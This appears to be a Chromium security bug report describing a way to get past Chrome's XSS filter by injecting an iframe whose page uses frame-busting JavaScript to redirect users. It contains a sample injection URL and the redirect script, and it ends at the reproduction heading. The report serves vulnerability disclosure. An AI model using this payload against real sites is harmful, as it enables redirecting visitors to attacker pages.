This template is ONLY for reporting security bugs. If you are reporting a
Download Protection Bypass bug, please use the "Security - Download
Protection" template. For all other reports, please use a different
template.

Please READ THIS FAQ before filing a bug: https://www.chromium.org/Home
/chromium-security/security-faq

Please see the following link for instructions on filing security bugs:
http://www.chromium.org/Home/chromium-security/reporting-security-bugs

NOTE: Security bugs are normally made public once a fix has been widely
deployed.

VULNERABILITY DETAILS
The XSS (Cross-site scripting) filter recognises and blocks a number of injected strings that could allow users to be redirected, including redirect methods including <meta http-equiv"refresh" />

However, as the XSS filter does not block XSS strings that include <iframe /> tags that also include a valid src="" attribute, it is still possible to inject valid IFrames. 

The content of the embedded IFrame can be used in order to redirect users through the use of "frame busting" JavaScript.

For example a page vulnerable to XSS may contain the following XSS attack string, causing the attack page to be embedded.

http://www.modux.co.uk/attack/vuln.php?xsshere=<iframe src="https://www.modux.co.uk/attack/redir.php"%20/>

(This is a valid URL and can be used for verification)

For example, the JavaScript below can be embedded within the attack page in order to redirect users to the specified URL.

-------------------
<html>
<head>
<style> html{display:none;} </style>
<script>
   if(self == top) {
       document.documentElement.style.display = 'block'; 
   } else {
       top.location = "https://www.modux.co.uk"; 
   }
</script>
</head>
</html>
-------------------

VERSION
Chrome Version: 54.0.2840.71 m + stable
Operating System: [Windows 10 Pro, 1511]

REPRODUCTION CASE